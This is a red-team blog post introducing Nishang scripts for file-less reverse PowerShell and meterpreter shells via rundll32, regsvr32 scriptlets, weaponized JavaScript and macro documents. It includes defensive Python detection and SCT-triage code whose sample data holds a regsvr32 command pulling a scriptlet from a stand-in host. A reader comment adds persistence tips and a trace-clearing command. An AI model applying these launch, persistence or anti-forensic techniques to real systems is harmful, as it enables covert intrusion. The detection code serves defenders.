I have been following Casey Smith's brilliant work on JavaScript and COM Scriptlets. After looking at his work, I started playing with the code. I was interested in developing easy and customizable ways to use JavaScript, SCT files, rundll32 and regsvr32 for...well...interesting things. After using some weeknights and weekends, I give you the following PowerShell scripts (all available in Nishang):
Invoke-JSRatRundll
Based on JSRAT by Casey, Invoke-JSRatRundll uses rundll32.exe to execute JavaScript on a target, which provides a reverse PowerShell shell over HTTP. Why? Because it is so cool. Also, it is file-less, the client part is just a single command and, most importantly, it is another method to pwn targets :) The script and the client part are intelligent enough to figure out if a proxy is in use and to use the first proxy from multiple proxies in the Internet Explorer settings. Also, based on the method mentioned here, Invoke-JSRatRundll doesn't leave rundll32.exe running on the target when the "exit" command is used from the spawned reverse shell, so it is a clean exit.
The listener, on the attacker's machine, needs to be run from an elevated PowerShell session.
This is how it looks in action:
Start the listener
The above listener provides the following command to be run on a target. Please note that you will need to remove the newlines:
When the command is executed on the target:
We get a connect back on the listener:
Nice! A proxy aware, file-less, Reverse PowerShell Session.
The client part (one-line command) can be used whenever we have the ability to execute a command on the target. Below is an example of using the client part with Out-Word from Nishang. Note that the double quotes in the client part need to be escaped by doubling them.
When a target user opens the Word file and chooses to enable Macros, the listener will receive a connect back from the target machine. Bingo!
One thing to note in Invoke-JSRatRundll is that a window pops up temporarily whenever a command is executed on the target. This is because of the use of the WScript.Shell Exec method. The Run method, which provides silent execution, could not be used as it did not return the output without storing the output temporarily somewhere on the target.
Invoke-JSRatRegsvr
This script utilizes regsvr32.exe to provide a reverse PowerShell session over HTTP. Use of regsvr32, the technique which has been termed "Squiblydoo", has added benefits: regsvr32.exe takes care of the proxy by itself, the execution is file-less and, AFAIK, it leaves no traces on the target after a clean exit.
The listener needs to be run from an elevated PowerShell on the attacker's machine. This is how it looks in action:
The above listener provides the following command to be run on the target:
As soon as the command is executed on a target, using a client side attack, or any other method:
Great!
This script also shows a window momentarily on the target machine, for the same reason as Invoke-JSRatRundll.
Out-RundllCommand
Use this script to generate rundll32.exe one line commands. The generated command can be used on a target to run PowerShell commands and scripts or a reverse PowerShell session over TCP.
Here is how to generate a command.
Now, if the rundll32 command is executed on a target using client side attack or other methods, the payload will get executed.
During testing it was not possible to execute larger scripts (especially the encoded ones, due to the increased length). The added advantage of this script is that it can be used with a simple netcat listener on a Linux machine as well. There is no need to run a special listener, unlike in the above two scripts.
Start a netcat/Powercat listener. Run Out-RundllCommand with the -Reverse switch:
When the generated rundll32 command is executed on the target:
Nice!
Also, the execution is silent on the target machine. Please note that this script leaves rundll32.exe running on the target machine.
Out-JS
This script is useful for client side attacks. Using this script, we can create "weaponized" JavaScript files which can be sent to a target user to execute PowerShell scripts and commands. Once a user executes the file (a double click opens the file using Windows Script Host, wscript.exe), the specified payload gets executed on the target with the privileges of the current user. The default name of the generated file is Style.js.
Once again, it was not possible to execute large scripts, therefore, there is no option of specifying a script path. An example is included in the script to execute a reverse PowerShell session over TCP.
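All four launchers above leave the same kind of process-creation telemetry behind, which is where a blue team catches them. Below is an added example (mine, not code from Nishang or from this post) of that detection logic in Python, run over constructed Sysmon-style process records; the rule names, hosts, process IDs and the placeholder command lines are assumptions made for the demo.

```python
import re
from pathlib import PureWindowsPath

# Indicators for the launch patterns in the post: regsvr32 pulling a remote
# scriptlet, rundll32 running inline JavaScript, a .js in a user-writable path
# run by Windows Script Host, and the PowerShell stage each of them spawns.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
JS_PROTOCOL = re.compile(r"\bjavascript:", re.IGNORECASE)
USER_PATH_JS = re.compile(r"\\(Users|Temp|AppData)\\.*\.jse?\b", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe"} | SCRIPT_HOSTS

def classify(event):
    """Return the rule names a Sysmon-style process-creation record matches."""
    image = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    cmd = event["CommandLine"]
    hits = []
    if image == "regsvr32.exe" and (REMOTE_URL.search(cmd) or "scrobj.dll" in cmd.lower()):
        hits.append("regsvr32_remote_scriptlet")  # Invoke-JSRatRegsvr, Out-SCT
    if image == "rundll32.exe" and JS_PROTOCOL.search(cmd):
        hits.append("rundll32_javascript")        # Invoke-JSRatRundll, Out-RundllCommand
    if image in SCRIPT_HOSTS and USER_PATH_JS.search(cmd):
        hits.append("wsh_js_from_user_path")      # Out-JS (Style.js)
    if image == "powershell.exe" and parent in LOLBINS:
        hits.append("powershell_from_lolbin")     # reverse-shell stage of all four
    return hits

def scan(events):
    """Map ProcessId -> matched rules, dropping records that match nothing."""
    return {e["ProcessId"]: rules for e in events if (rules := classify(e))}

def ev(pid, image, parent, cmd):
    return {"ProcessId": pid, "Image": image, "ParentImage": parent, "CommandLine": cmd}

SYS = r"C:\Windows\System32"
# Constructed records, not real telemetry; hosts and payloads are placeholders.
SAMPLE_EVENTS = [
    ev(1001, SYS + r"\regsvr32.exe", SYS + r"\msiexec.exe",
       r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
    ev(1002, SYS + r"\regsvr32.exe", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
       "regsvr32.exe /s /u /i:http://203.0.113.5/UpdateCheck.xml scrobj.dll"),
    ev(1003, SYS + r"\rundll32.exe", r"C:\Windows\explorer.exe",
       'rundll32.exe javascript:"<constructed placeholder>"'),
    ev(1004, SYS + r"\WindowsPowerShell\v1.0\powershell.exe", SYS + r"\rundll32.exe",
       "powershell.exe -NoProfile -WindowStyle Hidden -Command <constructed placeholder>"),
    ev(1005, SYS + r"\wscript.exe", r"C:\Windows\explorer.exe",
       r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Style.js"'),
]
```

The first record is a vendor DLL registered by an installer and matches nothing; the parent/child rule is the one that survives even when the command line is obfuscated, since the PowerShell stage still has to be spawned by the host binary.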
Out-SCT
This script generates an SCT file which can be used with regsvr32.exe to execute PowerShell scripts and commands. The default name of the generated file is UpdateCheck.xml. This file needs to be hosted on a web server and the regsvr32 one-liner is to be executed on the target. Note that, in case a PayloadURL is provided, two connections are made from the target environment: the first one to pull the SCT file and the second one to download the PowerShell script.
Like Out-JS, only small scripts can be executed using Out-SCT. An example is included in the help of this script which explains usage of a reverse PowerShell session over TCP without having to download a script.
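Because the SCT file has to be hosted, and (as a comment below notes) gets cached on the target, a responder often ends up holding the scriptlet itself. The following is an added Python triage parser, not part of Nishang or this post, for the scriptlet layout Out-SCT produces; the two sample files, the indicator patterns, the progids, classids and the placeholder command are constructed assumptions. It also normalizes the uppercase "<?XML" declaration that the Windows scriptlet loader accepts but strict XML parsers reject.

```python
import re
import xml.etree.ElementTree as ET
# What a scriptlet has no business containing if it only registers a COM object.
SHELL_OBJECT = re.compile(r'ActiveXObject\(\s*"(WScript\.Shell|Shell\.Application)"', re.IGNORECASE)
POWERSHELL = re.compile(r"\bpowershell(\.exe)?\b", re.IGNORECASE)
ENCODED = re.compile(r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}", re.IGNORECASE)
REMOTE = re.compile(r"https?://[^\s>\"']+", re.IGNORECASE)
# scrobj.dll accepts a case-insensitive <?XML ...?> declaration; expat does not.
DECL = re.compile(r"^\s*<\?xml[^>]*\?>", re.IGNORECASE)

def triage_sct(xml_text):
    """Parse a COM scriptlet and return registrations, script summaries and flags."""
    root = ET.fromstring(DECL.sub("", xml_text, count=1))
    if root.tag.lower() != "scriptlet":
        raise ValueError("not a scriptlet document: root is %r" % root.tag)
    report = {"registrations": [], "scripts": [], "flags": set(), "urls": []}
    for reg in root.iter("registration"):
        report["registrations"].append({"progid": reg.get("progid"), "classid": reg.get("classid")})
    for script in root.iter("script"):
        body = script.text or ""  # CDATA content comes back as plain text
        report["scripts"].append({"language": script.get("language"), "length": len(body)})
        for name, pattern in (("shell_object", SHELL_OBJECT), ("powershell_launch", POWERSHELL),
                              ("encoded_command", ENCODED)):
            if pattern.search(body):
                report["flags"].add(name)
        report["urls"].extend(REMOTE.findall(body))
    report["flags"] = sorted(report["flags"])
    return report

# Constructed sample in the layout Out-SCT produces (UpdateCheck.xml); the
# classid, host and PowerShell command are placeholders, not a working payload.
SAMPLE_SCT = """<?XML version="1.0"?>
<scriptlet>
<registration progid="UpdateCheck" classid="{00000000-0000-0000-0000-000000000000}">
<script language="JScript"><![CDATA[
  var sh = new ActiveXObject("WScript.Shell");
  sh.Run("powershell.exe -NoProfile -Command <placeholder fetching http://203.0.113.5/payload.ps1>", 0, true);
]]></script>
</registration>
</scriptlet>"""

# A scriptlet that only registers a component and defines a function: no flags expected.
BENIGN_SCT = """<?xml version="1.0"?>
<scriptlet>
<registration progid="Vendor.Helper" classid="{11111111-2222-3333-4444-555555555555}"/>
<script language="VBScript"><![CDATA[
Function Add(a, b): Add = a + b: End Function
]]></script>
</scriptlet>"""
```

The "urls" list is what ties the cached scriptlet back to the second connection the post mentions, the download of the PowerShell script named in PayloadURL.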
Usage with Metasploit
Some of the above scripts can be used to get a meterpreter session in the following ways:
Using Out-SCT
Pass the URL where the meterpreter PowerShell script is hosted to Out-SCT.
Now, host the generated SCT file on a web server. When the generated regsvr32 command is executed on a target, this will happen:
Awesome! A reverse HTTPS meterpreter from a file-less execution, which is also helpful in avoiding AppLocker!
Using Out-JS
Pass the URL to Out-JS.
When the generated Style.js is executed on a target, we will get a connect back on msfconsole!
Using Out-RundllCommand
Pass the URL to Out-RundllCommand.
Once again, when the generated rundll32 command is executed on a target, a meterpreter will pop up in the msfconsole.
That is all for this post, all the scripts are available in the GitHub repository of Nishang. Hope you liked it. Please leave feedback and comments.
Join me for a two-day training "Offensive PowerShell for Red and Blue Teams" at Shakacon, Honolulu (2 days - July 11th - 12th, 2016) - https://www.shakacon.org/trainings/offensive-powershell-for-red-and-blue-teams-by-nikhil-mittal/
References/Further Reading
Casey and some of his work:
https://twitter.com/subTee
http://subt0x10.blogspot.in/2016/04/setting-up-homestead-in-enterprise-with.html
https://github.com/subTee/SCTPersistence
https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
Detailed blog on JSRAT
http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html
Defenses against regsvr32:
http://www.brimorlabsblog.com/2016/04/very-quick-blog-post-on-squiblydoo.html
https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET#blocking-the-regsvr32-application-whitelisting-bypass-technique
well done dude
That was awesome!
Can you take me on Ethical Hacking?
Obotesco20@gmail.com
Bit late on this topic but that said, this is my go-to technique when it comes to persistence. Adding regsvr32 to the registry (does not pop up the window) or to the WMI at startup gives great flexibility, since we can edit the scriptlet and change the payload remotely. It's worth mentioning though that (at least on Win 10) the scriptlet is being saved in temporary IE files, and being run from that location afterwards (instead of the web). So it's a good practice to clear that up with "RunDll32.exe InetCpl.cpl, ClearMyTracksByProcess 8" for example. Cheers.
Good to know. Thanks!